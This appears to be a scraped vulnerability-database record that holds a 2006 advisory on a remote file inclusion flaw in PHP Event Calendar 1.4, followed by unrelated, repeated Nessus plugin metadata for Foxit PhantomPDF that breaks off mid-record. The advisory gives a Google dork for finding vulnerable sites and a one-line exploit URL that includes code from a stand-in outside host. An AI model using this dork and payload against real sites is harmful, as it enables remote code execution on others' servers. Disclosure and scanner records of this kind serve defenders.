ID SECURITYVULNS:DOC:13557Type securityvulnsReporter SecurityvulnsModified 2006-07-24T00:00:00
Description
#######################SolpotCrew Community
PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
Vendor site : http://www.softcomplex.com/products/php_event_calendar/
Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
contact: chris_hasibuan@yahoo.com
Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
home_edition2001 , Anggands , Rendy , cow_1seng
and all crew #mardongan @ irc.dal.net
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from calendar.php
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode
########################MY LOVE JUST FOR U RIE
################################E.O.F
{"id": "SECURITYVULNS:DOC:13557", "bulletinFamily": "software", "title": "PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion", "description": "#############################SolpotCrew Community################################\r\n#\r\n# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion \r\n#\r\n# Vendor site : http://www.softcomplex.com/products/php_event_calendar/\r\n#\r\n#################################################################################\r\n#\r\n#\r\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)\r\n#\r\n# contact: chris_hasibuan@yahoo.com \r\n# \r\n# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt\r\n#\r\n################################################################################\r\n#\r\n#\r\n# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , \r\n# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\r\n# home_edition2001 , Anggands , Rendy , cow_1seng\r\n# and all crew #mardongan @ irc.dal.net\r\n#\r\n#\r\n###############################################################################\r\nInput passed to the "path_to_calendar" is not properly verified \r\nbefore being used to include files. This can be exploited to execute \r\narbitrary PHP code by including files from local or external resources.\r\n\r\ncode from calendar.php\r\n\r\nif(!$path_to_calendar){\r\n $path_to_calendar = $_path_to_calendar;\r\n}\r\nextract($HTTP_POST_VARS);\r\nextract($HTTP_GET_VARS);\r\ninclude_once $path_to_calendar.'db.php';\r\nfunction show_calendar($index_calendar='') {\r\n global $db,$path_to_data,$settings;\r\n\r\nGoogle dork : inurl:/cl_files/\r\n\r\nexploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode\r\n\r\n\r\n##############################MY LOVE JUST FOR U RIE#########################\r\n######################################E.O.F##################################\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13557", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 90, "enchantments": {"score": {"value": 1.5, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB317244", "KB980408", "KB981401", "KB2785908", "KB953331", "KB2404575", "KB2510690", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 1.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}
{"nessus": [{"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "f8340e3935aec5e92d9b34d2e11d0d27", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T23:46:45", "history": [{"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "1b2c73e3506b9ea60c12232a10b31a6ac25fd18b3c729b2eff63d82e4c0f4847", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-31T10:46:04", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2020-12-31T10:46:04", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-31T10:46:04", "rev": 2, "value": 7.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/30\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13570\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-12-31T10:46:04", "differentElements": ["cvss", "reporter", "sourceData"], "edition": 1}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "a92a522491e2669dbd7d26084dc62bff675e076c2956a14d031e25c0efa6d9db", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-01-05T10:52:51", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-01-05T10:52:51", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-01-05T10:52:51", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13548\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-05T10:52:51", "differentElements": ["cvss", "cvss3", "sourceData"], "edition": 2}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "f746bc6cb8e9f296d8a3ffa42dfad3020a721827c6f04480b75738a3b43aed05", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-18T10:51:53", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-02-18T10:51:53", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-18T10:51:53", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/17\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-18T10:51:53", "differentElements": ["cvss3", "sourceData"], "edition": 3}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "3ed313ed8a2b38143cface66178191b61b7ed14d30ccb8384d1cba5559194c1b", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-20T10:49:47", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-02-20T10:49:47", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-20T10:49:47", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-20T10:49:47", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "f9ce40577f239b2437b2e869d654d016f5e61c49acc1b367aac7c5aad77ee560", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-06-03T23:58:24", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-06-03T23:58:24", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-06-03T23:58:24", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version 